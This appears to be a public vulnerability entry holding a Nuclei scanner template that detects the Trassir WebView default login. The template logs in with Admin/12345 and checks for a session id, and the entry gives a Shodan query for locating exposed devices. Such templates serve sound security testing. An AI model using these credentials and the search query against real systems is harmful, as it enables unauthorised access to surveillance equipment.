漏洞描述
Trassir WebView contains a default login vulnerability. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations.
trassir-default-login: Trassir WebView Default Login - Detect
PoC代码[已公开]
id: trassir-default-login
info:
name: Trassir WebView Default Login - Detect
author: gtrrnr,metascan
severity: high
description: |
Trassir WebView contains a default login vulnerability. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations.
reference:
- https://confluence.trassir.com/display/TKB/How+to+reset+the+administrator+password+on+the+TRASSIR+NVR
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
cvss-score: 8.3
cwe-id: CWE-522
metadata:
verified: true
max-request: 1
shodan-query: title:"Trassir Webview"
tags: default-login,trassir,webview,vuln
http:
- raw:
- |
POST /login HTTP/1.1
Host: {{Hostname}}
username={{username}}&password={{password}}
attack: clusterbomb
payloads:
username:
- Admin
password:
- 12345
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"success" :'
- '"sid" :'
condition: and
case-insensitive: true
- type: word
part: header
words:
- 'application/json'
- type: status
status:
- 200
# digest: 4b0a00483046022100d92212542fc556429fc9b07d2478665064bc7a67bc2649a6e03ac5fcad8ca0b5022100b4c3ece681f893de1afce5823cdbcebbf3667c76399530914f599fb377255de6:922c64590222798bb761d5b6d8e72950